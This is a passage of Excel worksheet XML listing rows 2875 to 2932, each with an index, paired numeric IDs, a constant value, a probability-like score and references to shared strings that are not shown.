        <v>5682</v>
      </c>
    </row>
    <row r="2875" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2875" s="1">
        <v>2873</v>
      </c>
      <c r="B2875">
        <v>6340</v>
      </c>
      <c r="C2875">
        <v>6340</v>
      </c>
      <c r="D2875">
        <v>2</v>
      </c>
      <c r="E2875">
        <v>0.99919998645782471</v>
      </c>
      <c r="F2875" t="s">
        <v>5592</v>
      </c>
      <c r="G2875" t="s">
        <v>5683</v>
      </c>
      <c r="H2875" t="s">
        <v>5684</v>
      </c>
    </row>
    <row r="2876" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2876" s="1">
        <v>2874</v>
      </c>
      <c r="B2876">
        <v>6283</v>
      </c>
      <c r="C2876">
        <v>6283</v>
      </c>
      <c r="D2876">
        <v>2</v>
      </c>
      <c r="E2876">
        <v>0.97430002689361572</v>
      </c>
      <c r="F2876" t="s">
        <v>5592</v>
      </c>
      <c r="G2876" t="s">
        <v>5685</v>
      </c>
      <c r="H2876" t="s">
        <v>5686</v>
      </c>
    </row>
    <row r="2877" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2877" s="1">
        <v>2875</v>
      </c>
      <c r="B2877">
        <v>3734</v>
      </c>
      <c r="C2877">
        <v>3734</v>
      </c>
      <c r="D2877">
        <v>2</v>
      </c>
      <c r="E2877">
        <v>0.57200002670288086</v>
      </c>
      <c r="F2877" t="s">
        <v>5592</v>
      </c>
      <c r="G2877" t="s">
        <v>5687</v>
      </c>
      <c r="H2877" t="s">
        <v>5688</v>
      </c>
    </row>
    <row r="2878" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2878" s="1">
        <v>2876</v>
      </c>
      <c r="B2878">
        <v>3813</v>
      </c>
      <c r="C2878">
        <v>3813</v>
      </c>
      <c r="D2878">
        <v>2</v>
      </c>
      <c r="E2878">
        <v>0.51200002431869507</v>
      </c>
      <c r="F2878" t="s">
        <v>5592</v>
      </c>
      <c r="G2878" t="s">
        <v>5689</v>
      </c>
      <c r="H2878" t="s">
        <v>5690</v>
      </c>
    </row>
    <row r="2879" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2879" s="1">
        <v>2877</v>
      </c>
      <c r="B2879">
        <v>3871</v>
      </c>
      <c r="C2879">
        <v>3871</v>
      </c>
      <c r="D2879">
        <v>2</v>
      </c>
      <c r="E2879">
        <v>0.99290001392364502</v>
      </c>
      <c r="F2879" t="s">
        <v>5592</v>
      </c>
      <c r="G2879" t="s">
        <v>5691</v>
      </c>
      <c r="H2879" t="s">
        <v>5692</v>
      </c>
    </row>
    <row r="2880" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2880" s="1">
        <v>2878</v>
      </c>
      <c r="B2880">
        <v>3870</v>
      </c>
      <c r="C2880">
        <v>3870</v>
      </c>
      <c r="D2880">
        <v>2</v>
      </c>
      <c r="E2880">
        <v>0.99779999256134033</v>
      </c>
      <c r="F2880" t="s">
        <v>5592</v>
      </c>
      <c r="G2880" t="s">
        <v>5693</v>
      </c>
      <c r="H2880" t="s">
        <v>5694</v>
      </c>
    </row>
    <row r="2881" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2881" s="1">
        <v>2879</v>
      </c>
      <c r="B2881">
        <v>3733</v>
      </c>
      <c r="C2881">
        <v>3733</v>
      </c>
      <c r="D2881">
        <v>2</v>
      </c>
      <c r="E2881">
        <v>0.73350000381469727</v>
      </c>
      <c r="F2881" t="s">
        <v>5592</v>
      </c>
      <c r="G2881" t="s">
        <v>5695</v>
      </c>
      <c r="H2881" t="s">
        <v>5696</v>
      </c>
    </row>
    <row r="2882" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2882" s="1">
        <v>2880</v>
      </c>
      <c r="B2882">
        <v>3815</v>
      </c>
      <c r="C2882">
        <v>3815</v>
      </c>
      <c r="D2882">
        <v>2</v>
      </c>
      <c r="E2882">
        <v>0.991100013256073</v>
      </c>
      <c r="F2882" t="s">
        <v>5592</v>
      </c>
      <c r="G2882" t="s">
        <v>5697</v>
      </c>
      <c r="H2882" t="s">
        <v>5698</v>
      </c>
    </row>
    <row r="2883" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2883" s="1">
        <v>2881</v>
      </c>
      <c r="B2883">
        <v>3818</v>
      </c>
      <c r="C2883">
        <v>3818</v>
      </c>
      <c r="D2883">
        <v>2</v>
      </c>
      <c r="E2883">
        <v>0.45339998602867132</v>
      </c>
      <c r="F2883" t="s">
        <v>5592</v>
      </c>
      <c r="G2883" t="s">
        <v>5699</v>
      </c>
      <c r="H2883" t="s">
        <v>5700</v>
      </c>
    </row>
    <row r="2884" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2884" s="1">
        <v>2882</v>
      </c>
      <c r="B2884">
        <v>3868</v>
      </c>
      <c r="C2884">
        <v>3868</v>
      </c>
      <c r="D2884">
        <v>2</v>
      </c>
      <c r="E2884">
        <v>0.89859998226165771</v>
      </c>
      <c r="F2884" t="s">
        <v>5592</v>
      </c>
      <c r="G2884" t="s">
        <v>5701</v>
      </c>
      <c r="H2884" t="s">
        <v>5702</v>
      </c>
    </row>
    <row r="2885" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2885" s="1">
        <v>2883</v>
      </c>
      <c r="B2885">
        <v>6365</v>
      </c>
      <c r="C2885">
        <v>6365</v>
      </c>
      <c r="D2885">
        <v>2</v>
      </c>
      <c r="E2885">
        <v>0.99699997901916504</v>
      </c>
      <c r="F2885" t="s">
        <v>5592</v>
      </c>
      <c r="G2885" t="s">
        <v>5703</v>
      </c>
      <c r="H2885" t="s">
        <v>5704</v>
      </c>
    </row>
    <row r="2886" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2886" s="1">
        <v>2884</v>
      </c>
      <c r="B2886">
        <v>6366</v>
      </c>
      <c r="C2886">
        <v>6366</v>
      </c>
      <c r="D2886">
        <v>2</v>
      </c>
      <c r="E2886">
        <v>0.99699997901916504</v>
      </c>
      <c r="F2886" t="s">
        <v>5592</v>
      </c>
      <c r="G2886" t="s">
        <v>5705</v>
      </c>
      <c r="H2886" t="s">
        <v>5704</v>
      </c>
    </row>
    <row r="2887" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2887" s="1">
        <v>2885</v>
      </c>
      <c r="B2887">
        <v>3820</v>
      </c>
      <c r="C2887">
        <v>3820</v>
      </c>
      <c r="D2887">
        <v>2</v>
      </c>
      <c r="E2887">
        <v>0.86229997873306274</v>
      </c>
      <c r="F2887" t="s">
        <v>5592</v>
      </c>
      <c r="G2887" t="s">
        <v>5706</v>
      </c>
      <c r="H2887" t="s">
        <v>5707</v>
      </c>
    </row>
    <row r="2888" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2888" s="1">
        <v>2886</v>
      </c>
      <c r="B2888">
        <v>3732</v>
      </c>
      <c r="C2888">
        <v>3732</v>
      </c>
      <c r="D2888">
        <v>2</v>
      </c>
      <c r="E2888">
        <v>0.76599997282028198</v>
      </c>
      <c r="F2888" t="s">
        <v>5592</v>
      </c>
      <c r="G2888" t="s">
        <v>5708</v>
      </c>
      <c r="H2888" t="s">
        <v>5709</v>
      </c>
    </row>
    <row r="2889" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2889" s="1">
        <v>2887</v>
      </c>
      <c r="B2889">
        <v>3805</v>
      </c>
      <c r="C2889">
        <v>3805</v>
      </c>
      <c r="D2889">
        <v>2</v>
      </c>
      <c r="E2889">
        <v>0.77619999647140503</v>
      </c>
      <c r="F2889" t="s">
        <v>5592</v>
      </c>
      <c r="G2889" t="s">
        <v>5710</v>
      </c>
      <c r="H2889" t="s">
        <v>5711</v>
      </c>
    </row>
    <row r="2890" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2890" s="1">
        <v>2888</v>
      </c>
      <c r="B2890">
        <v>3804</v>
      </c>
      <c r="C2890">
        <v>3804</v>
      </c>
      <c r="D2890">
        <v>2</v>
      </c>
      <c r="E2890">
        <v>0.99299997091293335</v>
      </c>
      <c r="F2890" t="s">
        <v>5592</v>
      </c>
      <c r="G2890" t="s">
        <v>5712</v>
      </c>
      <c r="H2890" t="s">
        <v>5713</v>
      </c>
    </row>
    <row r="2891" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2891" s="1">
        <v>2889</v>
      </c>
      <c r="B2891">
        <v>5453</v>
      </c>
      <c r="C2891">
        <v>5453</v>
      </c>
      <c r="D2891">
        <v>2</v>
      </c>
      <c r="E2891">
        <v>0.66949999332427979</v>
      </c>
      <c r="F2891" t="s">
        <v>5592</v>
      </c>
      <c r="G2891" t="s">
        <v>5714</v>
      </c>
      <c r="H2891" t="s">
        <v>5715</v>
      </c>
    </row>
    <row r="2892" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2892" s="1">
        <v>2890</v>
      </c>
      <c r="B2892">
        <v>3828</v>
      </c>
      <c r="C2892">
        <v>3828</v>
      </c>
      <c r="D2892">
        <v>2</v>
      </c>
      <c r="E2892">
        <v>0.99849998950958252</v>
      </c>
      <c r="F2892" t="s">
        <v>5592</v>
      </c>
      <c r="G2892" t="s">
        <v>5716</v>
      </c>
      <c r="H2892" t="s">
        <v>5717</v>
      </c>
    </row>
    <row r="2893" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2893" s="1">
        <v>2891</v>
      </c>
      <c r="B2893">
        <v>5514</v>
      </c>
      <c r="C2893">
        <v>5514</v>
      </c>
      <c r="D2893">
        <v>2</v>
      </c>
      <c r="E2893">
        <v>0.99720001220703125</v>
      </c>
      <c r="F2893" t="s">
        <v>5592</v>
      </c>
      <c r="G2893" t="s">
        <v>5718</v>
      </c>
      <c r="H2893" t="s">
        <v>5719</v>
      </c>
    </row>
    <row r="2894" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2894" s="1">
        <v>2892</v>
      </c>
      <c r="B2894">
        <v>3927</v>
      </c>
      <c r="C2894">
        <v>3927</v>
      </c>
      <c r="D2894">
        <v>2</v>
      </c>
      <c r="E2894">
        <v>0.90630000829696655</v>
      </c>
      <c r="F2894" t="s">
        <v>5592</v>
      </c>
      <c r="G2894" t="s">
        <v>5720</v>
      </c>
      <c r="H2894" t="s">
        <v>5721</v>
      </c>
    </row>
    <row r="2895" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2895" s="1">
        <v>2893</v>
      </c>
      <c r="B2895">
        <v>3928</v>
      </c>
      <c r="C2895">
        <v>3928</v>
      </c>
      <c r="D2895">
        <v>2</v>
      </c>
      <c r="E2895">
        <v>0.88779997825622559</v>
      </c>
      <c r="F2895" t="s">
        <v>5592</v>
      </c>
      <c r="G2895" t="s">
        <v>5722</v>
      </c>
      <c r="H2895" t="s">
        <v>5723</v>
      </c>
    </row>
    <row r="2896" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2896" s="1">
        <v>2894</v>
      </c>
      <c r="B2896">
        <v>5458</v>
      </c>
      <c r="C2896">
        <v>5458</v>
      </c>
      <c r="D2896">
        <v>2</v>
      </c>
      <c r="E2896">
        <v>0.99129998683929443</v>
      </c>
      <c r="F2896" t="s">
        <v>5592</v>
      </c>
      <c r="G2896" t="s">
        <v>5724</v>
      </c>
      <c r="H2896" t="s">
        <v>5725</v>
      </c>
    </row>
    <row r="2897" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2897" s="1">
        <v>2895</v>
      </c>
      <c r="B2897">
        <v>3797</v>
      </c>
      <c r="C2897">
        <v>3797</v>
      </c>
      <c r="D2897">
        <v>2</v>
      </c>
      <c r="E2897">
        <v>0.73430001735687256</v>
      </c>
      <c r="F2897" t="s">
        <v>5592</v>
      </c>
      <c r="G2897" t="s">
        <v>5726</v>
      </c>
      <c r="H2897" t="s">
        <v>5727</v>
      </c>
    </row>
    <row r="2898" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2898" s="1">
        <v>2896</v>
      </c>
      <c r="B2898">
        <v>3866</v>
      </c>
      <c r="C2898">
        <v>3866</v>
      </c>
      <c r="D2898">
        <v>2</v>
      </c>
      <c r="E2898">
        <v>0.79759997129440308</v>
      </c>
      <c r="F2898" t="s">
        <v>5592</v>
      </c>
      <c r="G2898" t="s">
        <v>5728</v>
      </c>
      <c r="H2898" t="s">
        <v>5729</v>
      </c>
    </row>
    <row r="2899" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2899" s="1">
        <v>2897</v>
      </c>
      <c r="B2899">
        <v>5513</v>
      </c>
      <c r="C2899">
        <v>5513</v>
      </c>
      <c r="D2899">
        <v>2</v>
      </c>
      <c r="E2899">
        <v>0.83359998464584351</v>
      </c>
      <c r="F2899" t="s">
        <v>5592</v>
      </c>
      <c r="G2899" t="s">
        <v>5730</v>
      </c>
      <c r="H2899" t="s">
        <v>5731</v>
      </c>
    </row>
    <row r="2900" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2900" s="1">
        <v>2898</v>
      </c>
      <c r="B2900">
        <v>3741</v>
      </c>
      <c r="C2900">
        <v>3741</v>
      </c>
      <c r="D2900">
        <v>2</v>
      </c>
      <c r="E2900">
        <v>0.92930001020431519</v>
      </c>
      <c r="F2900" t="s">
        <v>5592</v>
      </c>
      <c r="G2900" t="s">
        <v>5732</v>
      </c>
      <c r="H2900" t="s">
        <v>5733</v>
      </c>
    </row>
    <row r="2901" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2901" s="1">
        <v>2899</v>
      </c>
      <c r="B2901">
        <v>6269</v>
      </c>
      <c r="C2901">
        <v>6269</v>
      </c>
      <c r="D2901">
        <v>2</v>
      </c>
      <c r="E2901">
        <v>0.80750000476837158</v>
      </c>
      <c r="F2901" t="s">
        <v>5592</v>
      </c>
      <c r="G2901" t="s">
        <v>5734</v>
      </c>
      <c r="H2901" t="s">
        <v>5735</v>
      </c>
    </row>
    <row r="2902" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2902" s="1">
        <v>2900</v>
      </c>
      <c r="B2902">
        <v>3737</v>
      </c>
      <c r="C2902">
        <v>3737</v>
      </c>
      <c r="D2902">
        <v>2</v>
      </c>
      <c r="E2902">
        <v>0.64679998159408569</v>
      </c>
      <c r="F2902" t="s">
        <v>5592</v>
      </c>
      <c r="G2902" t="s">
        <v>5736</v>
      </c>
      <c r="H2902" t="s">
        <v>5737</v>
      </c>
    </row>
    <row r="2903" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2903" s="1">
        <v>2901</v>
      </c>
      <c r="B2903">
        <v>5422</v>
      </c>
      <c r="C2903">
        <v>5422</v>
      </c>
      <c r="D2903">
        <v>2</v>
      </c>
      <c r="E2903">
        <v>0.90310001373291016</v>
      </c>
      <c r="F2903" t="s">
        <v>5592</v>
      </c>
      <c r="G2903" t="s">
        <v>5738</v>
      </c>
      <c r="H2903" t="s">
        <v>5739</v>
      </c>
    </row>
    <row r="2904" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2904" s="1">
        <v>2902</v>
      </c>
      <c r="B2904">
        <v>5627</v>
      </c>
      <c r="C2904">
        <v>5627</v>
      </c>
      <c r="D2904">
        <v>2</v>
      </c>
      <c r="E2904">
        <v>0.99940001964569092</v>
      </c>
      <c r="F2904" t="s">
        <v>5592</v>
      </c>
      <c r="G2904" t="s">
        <v>5740</v>
      </c>
      <c r="H2904" t="s">
        <v>5741</v>
      </c>
    </row>
    <row r="2905" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2905" s="1">
        <v>2903</v>
      </c>
      <c r="B2905">
        <v>5392</v>
      </c>
      <c r="C2905">
        <v>5392</v>
      </c>
      <c r="D2905">
        <v>2</v>
      </c>
      <c r="E2905">
        <v>0.62099999189376831</v>
      </c>
      <c r="F2905" t="s">
        <v>5592</v>
      </c>
      <c r="G2905" t="s">
        <v>5742</v>
      </c>
      <c r="H2905" t="s">
        <v>5743</v>
      </c>
    </row>
    <row r="2906" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2906" s="1">
        <v>2904</v>
      </c>
      <c r="B2906">
        <v>6355</v>
      </c>
      <c r="C2906">
        <v>6355</v>
      </c>
      <c r="D2906">
        <v>2</v>
      </c>
      <c r="E2906">
        <v>0.65289998054504395</v>
      </c>
      <c r="F2906" t="s">
        <v>5592</v>
      </c>
      <c r="G2906" t="s">
        <v>5744</v>
      </c>
      <c r="H2906" t="s">
        <v>5745</v>
      </c>
    </row>
    <row r="2907" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2907" s="1">
        <v>2905</v>
      </c>
      <c r="B2907">
        <v>3932</v>
      </c>
      <c r="C2907">
        <v>3932</v>
      </c>
      <c r="D2907">
        <v>2</v>
      </c>
      <c r="E2907">
        <v>0.97610002756118774</v>
      </c>
      <c r="F2907" t="s">
        <v>5592</v>
      </c>
      <c r="G2907" t="s">
        <v>5746</v>
      </c>
      <c r="H2907" t="s">
        <v>5747</v>
      </c>
    </row>
    <row r="2908" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2908" s="1">
        <v>2906</v>
      </c>
      <c r="B2908">
        <v>6300</v>
      </c>
      <c r="C2908">
        <v>6300</v>
      </c>
      <c r="D2908">
        <v>2</v>
      </c>
      <c r="E2908">
        <v>0.6381000280380249</v>
      </c>
      <c r="F2908" t="s">
        <v>5592</v>
      </c>
      <c r="G2908" t="s">
        <v>5748</v>
      </c>
      <c r="H2908" t="s">
        <v>5749</v>
      </c>
    </row>
    <row r="2909" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2909" s="1">
        <v>2907</v>
      </c>
      <c r="B2909">
        <v>3671</v>
      </c>
      <c r="C2909">
        <v>3671</v>
      </c>
      <c r="D2909">
        <v>2</v>
      </c>
      <c r="E2909">
        <v>0.99150002002716064</v>
      </c>
      <c r="F2909" t="s">
        <v>5592</v>
      </c>
      <c r="G2909" t="s">
        <v>5750</v>
      </c>
      <c r="H2909" t="s">
        <v>5751</v>
      </c>
    </row>
    <row r="2910" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2910" s="1">
        <v>2908</v>
      </c>
      <c r="B2910">
        <v>5512</v>
      </c>
      <c r="C2910">
        <v>5512</v>
      </c>
      <c r="D2910">
        <v>2</v>
      </c>
      <c r="E2910">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2910" t="s">
        <v>5592</v>
      </c>
      <c r="G2910" t="s">
        <v>5752</v>
      </c>
      <c r="H2910" t="s">
        <v>5753</v>
      </c>
    </row>
    <row r="2911" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2911" s="1">
        <v>2909</v>
      </c>
      <c r="B2911">
        <v>5446</v>
      </c>
      <c r="C2911">
        <v>5446</v>
      </c>
      <c r="D2911">
        <v>2</v>
      </c>
      <c r="E2911">
        <v>0.99779999256134033</v>
      </c>
      <c r="F2911" t="s">
        <v>5592</v>
      </c>
      <c r="G2911" t="s">
        <v>5754</v>
      </c>
      <c r="H2911" t="s">
        <v>5755</v>
      </c>
    </row>
    <row r="2912" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2912" s="1">
        <v>2910</v>
      </c>
      <c r="B2912">
        <v>3730</v>
      </c>
      <c r="C2912">
        <v>3730</v>
      </c>
      <c r="D2912">
        <v>2</v>
      </c>
      <c r="E2912">
        <v>0.61210000514984131</v>
      </c>
      <c r="F2912" t="s">
        <v>5592</v>
      </c>
      <c r="G2912" t="s">
        <v>5756</v>
      </c>
      <c r="H2912" t="s">
        <v>5757</v>
      </c>
    </row>
    <row r="2913" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2913" s="1">
        <v>2911</v>
      </c>
      <c r="B2913">
        <v>6280</v>
      </c>
      <c r="C2913">
        <v>6280</v>
      </c>
      <c r="D2913">
        <v>2</v>
      </c>
      <c r="E2913">
        <v>0.79540002346038818</v>
      </c>
      <c r="F2913" t="s">
        <v>5592</v>
      </c>
      <c r="G2913" t="s">
        <v>5758</v>
      </c>
      <c r="H2913" t="s">
        <v>5759</v>
      </c>
    </row>
    <row r="2914" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2914" s="1">
        <v>2912</v>
      </c>
      <c r="B2914">
        <v>5447</v>
      </c>
      <c r="C2914">
        <v>5447</v>
      </c>
      <c r="D2914">
        <v>2</v>
      </c>
      <c r="E2914">
        <v>0.73019999265670776</v>
      </c>
      <c r="F2914" t="s">
        <v>5592</v>
      </c>
      <c r="G2914" t="s">
        <v>5760</v>
      </c>
      <c r="H2914" t="s">
        <v>5761</v>
      </c>
    </row>
    <row r="2915" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2915" s="1">
        <v>2913</v>
      </c>
      <c r="B2915">
        <v>3731</v>
      </c>
      <c r="C2915">
        <v>3731</v>
      </c>
      <c r="D2915">
        <v>2</v>
      </c>
      <c r="E2915">
        <v>0.57010000944137573</v>
      </c>
      <c r="F2915" t="s">
        <v>5592</v>
      </c>
      <c r="G2915" t="s">
        <v>5762</v>
      </c>
      <c r="H2915" t="s">
        <v>5763</v>
      </c>
    </row>
    <row r="2916" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2916" s="1">
        <v>2914</v>
      </c>
      <c r="B2916">
        <v>3803</v>
      </c>
      <c r="C2916">
        <v>3803</v>
      </c>
      <c r="D2916">
        <v>2</v>
      </c>
      <c r="E2916">
        <v>0.77829998731613159</v>
      </c>
      <c r="F2916" t="s">
        <v>5592</v>
      </c>
      <c r="G2916" t="s">
        <v>5764</v>
      </c>
      <c r="H2916" t="s">
        <v>5765</v>
      </c>
    </row>
    <row r="2917" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2917" s="1">
        <v>2915</v>
      </c>
      <c r="B2917">
        <v>3794</v>
      </c>
      <c r="C2917">
        <v>3794</v>
      </c>
      <c r="D2917">
        <v>2</v>
      </c>
      <c r="E2917">
        <v>0.36590000987052917</v>
      </c>
      <c r="F2917" t="s">
        <v>5592</v>
      </c>
      <c r="G2917" t="s">
        <v>5766</v>
      </c>
      <c r="H2917" t="s">
        <v>5767</v>
      </c>
    </row>
    <row r="2918" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2918" s="1">
        <v>2916</v>
      </c>
      <c r="B2918">
        <v>5445</v>
      </c>
      <c r="C2918">
        <v>5445</v>
      </c>
      <c r="D2918">
        <v>2</v>
      </c>
      <c r="E2918">
        <v>0.96810001134872437</v>
      </c>
      <c r="F2918" t="s">
        <v>5592</v>
      </c>
      <c r="G2918" t="s">
        <v>5768</v>
      </c>
      <c r="H2918" t="s">
        <v>5769</v>
      </c>
    </row>
    <row r="2919" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2919" s="1">
        <v>2917</v>
      </c>
      <c r="B2919">
        <v>5619</v>
      </c>
      <c r="C2919">
        <v>5619</v>
      </c>
      <c r="D2919">
        <v>2</v>
      </c>
      <c r="E2919">
        <v>0.75959998369216919</v>
      </c>
      <c r="F2919" t="s">
        <v>5592</v>
      </c>
      <c r="G2919" t="s">
        <v>5770</v>
      </c>
      <c r="H2919" t="s">
        <v>5771</v>
      </c>
    </row>
    <row r="2920" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2920" s="1">
        <v>2918</v>
      </c>
      <c r="B2920">
        <v>5464</v>
      </c>
      <c r="C2920">
        <v>5464</v>
      </c>
      <c r="D2920">
        <v>2</v>
      </c>
      <c r="E2920">
        <v>0.85420000553131104</v>
      </c>
      <c r="F2920" t="s">
        <v>5592</v>
      </c>
      <c r="G2920" t="s">
        <v>5772</v>
      </c>
      <c r="H2920" t="s">
        <v>5773</v>
      </c>
    </row>
    <row r="2921" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2921" s="1">
        <v>2919</v>
      </c>
      <c r="B2921">
        <v>5536</v>
      </c>
      <c r="C2921">
        <v>5536</v>
      </c>
      <c r="D2921">
        <v>2</v>
      </c>
      <c r="E2921">
        <v>0.92170000076293945</v>
      </c>
      <c r="F2921" t="s">
        <v>5592</v>
      </c>
      <c r="G2921" t="s">
        <v>5774</v>
      </c>
      <c r="H2921" t="s">
        <v>5775</v>
      </c>
    </row>
    <row r="2922" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2922" s="1">
        <v>2920</v>
      </c>
      <c r="B2922">
        <v>5535</v>
      </c>
      <c r="C2922">
        <v>5535</v>
      </c>
      <c r="D2922">
        <v>2</v>
      </c>
      <c r="E2922">
        <v>0.98479998111724854</v>
      </c>
      <c r="F2922" t="s">
        <v>5592</v>
      </c>
      <c r="G2922" t="s">
        <v>5776</v>
      </c>
      <c r="H2922" t="s">
        <v>5777</v>
      </c>
    </row>
    <row r="2923" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2923" s="1">
        <v>2921</v>
      </c>
      <c r="B2923">
        <v>3711</v>
      </c>
      <c r="C2923">
        <v>3711</v>
      </c>
      <c r="D2923">
        <v>2</v>
      </c>
      <c r="E2923">
        <v>0.99830001592636108</v>
      </c>
      <c r="F2923" t="s">
        <v>5592</v>
      </c>
      <c r="G2923" t="s">
        <v>5778</v>
      </c>
      <c r="H2923" t="s">
        <v>5779</v>
      </c>
    </row>
    <row r="2924" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2924" s="1">
        <v>2922</v>
      </c>
      <c r="B2924">
        <v>3760</v>
      </c>
      <c r="C2924">
        <v>3760</v>
      </c>
      <c r="D2924">
        <v>2</v>
      </c>
      <c r="E2924">
        <v>0.50499999523162842</v>
      </c>
      <c r="F2924" t="s">
        <v>5592</v>
      </c>
      <c r="G2924" t="s">
        <v>5780</v>
      </c>
      <c r="H2924" t="s">
        <v>5781</v>
      </c>
    </row>
    <row r="2925" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2925" s="1">
        <v>2923</v>
      </c>
      <c r="B2925">
        <v>3899</v>
      </c>
      <c r="C2925">
        <v>3899</v>
      </c>
      <c r="D2925">
        <v>2</v>
      </c>
      <c r="E2925">
        <v>0.99459999799728394</v>
      </c>
      <c r="F2925" t="s">
        <v>5592</v>
      </c>
      <c r="G2925" t="s">
        <v>5782</v>
      </c>
      <c r="H2925" t="s">
        <v>5783</v>
      </c>
    </row>
    <row r="2926" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2926" s="1">
        <v>2924</v>
      </c>
      <c r="B2926">
        <v>3761</v>
      </c>
      <c r="C2926">
        <v>3761</v>
      </c>
      <c r="D2926">
        <v>2</v>
      </c>
      <c r="E2926">
        <v>0.60409998893737793</v>
      </c>
      <c r="F2926" t="s">
        <v>5592</v>
      </c>
      <c r="G2926" t="s">
        <v>5784</v>
      </c>
      <c r="H2926" t="s">
        <v>5785</v>
      </c>
    </row>
    <row r="2927" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2927" s="1">
        <v>2925</v>
      </c>
      <c r="B2927">
        <v>3710</v>
      </c>
      <c r="C2927">
        <v>3710</v>
      </c>
      <c r="D2927">
        <v>2</v>
      </c>
      <c r="E2927">
        <v>0.84350001811981201</v>
      </c>
      <c r="F2927" t="s">
        <v>5592</v>
      </c>
      <c r="G2927" t="s">
        <v>5786</v>
      </c>
      <c r="H2927" t="s">
        <v>5787</v>
      </c>
    </row>
    <row r="2928" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2928" s="1">
        <v>2926</v>
      </c>
      <c r="B2928">
        <v>6324</v>
      </c>
      <c r="C2928">
        <v>6324</v>
      </c>
      <c r="D2928">
        <v>2</v>
      </c>
      <c r="E2928">
        <v>0.94720000028610229</v>
      </c>
      <c r="F2928" t="s">
        <v>5592</v>
      </c>
      <c r="G2928" t="s">
        <v>5788</v>
      </c>
      <c r="H2928" t="s">
        <v>5789</v>
      </c>
    </row>
    <row r="2929" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2929" s="1">
        <v>2927</v>
      </c>
      <c r="B2929">
        <v>5534</v>
      </c>
      <c r="C2929">
        <v>5534</v>
      </c>
      <c r="D2929">
        <v>2</v>
      </c>
      <c r="E2929">
        <v>0.99580001831054688</v>
      </c>
      <c r="F2929" t="s">
        <v>5592</v>
      </c>
      <c r="G2929" t="s">
        <v>5790</v>
      </c>
      <c r="H2929" t="s">
        <v>5791</v>
      </c>
    </row>
    <row r="2930" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2930" s="1">
        <v>2928</v>
      </c>
      <c r="B2930">
        <v>6332</v>
      </c>
      <c r="C2930">
        <v>6332</v>
      </c>
      <c r="D2930">
        <v>2</v>
      </c>
      <c r="E2930">
        <v>0.75019997358322144</v>
      </c>
      <c r="F2930" t="s">
        <v>5592</v>
      </c>
      <c r="G2930" t="s">
        <v>5792</v>
      </c>
      <c r="H2930" t="s">
        <v>5793</v>
      </c>
    </row>
    <row r="2931" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2931" s="1">
        <v>2929</v>
      </c>
      <c r="B2931">
        <v>5610</v>
      </c>
      <c r="C2931">
        <v>5610</v>
      </c>
      <c r="D2931">
        <v>2</v>
      </c>
      <c r="E2931">
        <v>0.53960001468658447</v>
      </c>
      <c r="F2931" t="s">
        <v>5592</v>
      </c>
      <c r="G2931" t="s">
        <v>5794</v>
      </c>
      <c r="H2931" t="s">
        <v>5795</v>
      </c>
    </row>
    <row r="2932" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2932" s="1">
        <v>2930</v>
      </c>
      <c r="B2932">
        <v>3712</v>
      </c>
      <c r="C2932">
        <v>3712</v>
      </c>
      <c r="D2932">
        <v>2</v>
      </c>
      <c r="E2932">
        <v>0.98930001258850098</v>
      </c>
      <c r="F2932" t="s">
        <v>5592</v>
      </c>
      <c r="G2932" t="s">
        <v>5796</v>
      </c>
      <c r="H2932" t="s">
        <v>5797</v>
      </c>
    </row>
    <row r="2933" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2933" s="1">
        <v>2931</v>
      </c>
      <c r="B2933">
